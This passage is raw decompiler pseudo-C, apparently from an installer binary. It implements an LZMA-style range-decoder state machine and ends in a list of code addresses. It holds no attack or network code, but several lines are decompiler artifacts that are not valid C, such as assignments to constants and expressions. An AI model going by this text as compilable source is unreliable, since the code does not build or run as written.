											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}













                                                          0x00000000
                                                          0x00406d13
                                                          0x00406d13
                                                          0x00406d17
                                                          0x00406d24
                                                          0x00406d2e
                                                          0x00000000
                                                          0x00406d19
                                                          0x00406d19
                                                          0x00406d54
                                                          0x00406d57
                                                          0x00406d5a
                                                          0x00406d5d
                                                          0x00406d5d
                                                          0x00406d60
                                                          0x00406d67
                                                          0x00406d6c
                                                          0x00406c4d
                                                          0x00406c50
                                                          0x00406fc2
